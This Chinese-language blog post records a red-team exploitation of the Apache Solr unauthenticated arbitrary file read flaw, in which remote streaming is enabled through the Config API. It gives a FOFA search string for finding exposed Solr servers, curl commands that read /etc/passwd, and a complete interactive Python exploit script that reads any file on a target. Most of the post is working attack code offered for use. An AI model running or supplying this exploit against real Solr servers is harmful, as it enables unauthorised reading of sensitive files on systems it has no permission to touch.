这周在hw,水一篇文章,记录一下漏洞利用,当一个合格的脚本小子
0x01 漏洞描述 由于Apache Solr默认安装时未开启身份验证,导致未经身份验证的攻击者可利用Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,从而使攻击者可以在未授权的情况下获取目标服务器敏感文件。
听说报给官方后,官方拒绝修复,认为这不是一个漏洞,比一些src还离谱,人家起码会给个内部已知:eyes:
0x02 漏洞影响 Apache Solr <= 8.8.1(全版本)
0x03 漏洞复现 fofa 语法:app="Solr"
3.1 获取 core name,拼接url http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json
Core name为:arabnews,那么使用的url 为 http://xxx.xxx.xxx.xxx/solr/arabnews/config
1 curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx/solr/arabnews/config -H 'Content-type:application/json'
继续使用 core name 拼接 http://xxx.xxx.xxx.xxx/solr/arabnews/debug/dump?param=ContentStreams
1 curl "http://xxx.xxx.xxx.xxx/solr/arabnews/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
3.2 攻击
0x04 漏洞POC PeiQi文库的大佬已经写好了,我改了一点小毛病,读取完返回的值不一定是json,我复现的时候就遇到了这个问题,将json处理删掉了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 import requestsimport sysimport randomimport reimport base64import timefrom lxml import etreeimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title (): print ('+------------------------------------------' ) print ('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m' ) print ('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m' ) print ('+ \033[34m公众号 : PeiQi文库 \033[0m' ) print ('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m' ) print ('+ \033[36m使用格式: python3 CVE-2019-0193.py \033[0m' ) print ('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m' ) print ('+ \033[36mFile >>> 文件名称或目录 \033[0m' ) print ('+------------------------------------------' ) def POC_1 (target_url ): core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json" try : response = requests.request("GET" , url=core_url, timeout=10 ) core_name = list (json.loads(response.text)["status" ])[0 ] print ("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m" ) return core_name except : print ("\033[31m[x] 目标Url漏洞利用失败\033[0m" ) sys.exit(0 ) def POC_2 (target_url, core_name ): vuln_url = target_url + "/solr/" + core_name + "/config" headers = { "Content-type" :"application/json" } data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False , timeout=5 ) print ("\033[36m[o] 正在准备文件读取...... \033[0m" .format (target_url)) if "responseHeader" in response.text and response.status_code == 200 : print ("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m" .format (target_url)) else : print ("\033[31m[x] 目标 {} 不存在漏洞\033[0m" .format (target_url)) sys.exit(0 ) except Exception as e: print ("\033[31m[x] 请求失败 \033[0m" , e) def POC_3 (target_url, core_name, File_name ): vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams" .format (core_name) headers = { "Content-Type" : "application/x-www-form-urlencoded" } data = 'stream.url=file://{}' .format (File_name) try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False , timeout=5 ) if "No such file or directory" in response.text: print ("\033[31m[x] 读取{}失败 \033[0m" .format (File_name)) else : print ("\033[36m[o] 响应为:\n{} \033[0m" .format (response.text)) except Exception as e: print ("\033[31m[x] 请求失败 \033[0m" , e) if __name__ == '__main__' : title() target_url = str (input ("\033[35mPlease input Attack Url\nUrl >>> \033[0m" )) core_name = POC_1(target_url) POC_2(target_url, core_name) while True : File_name = str (input ("\033[35mFile >>> \033[0m" )) POC_3(target_url, core_name, File_name)
0x04 参考 Apache Solr 任意文件读取漏洞 1Day
WeChat
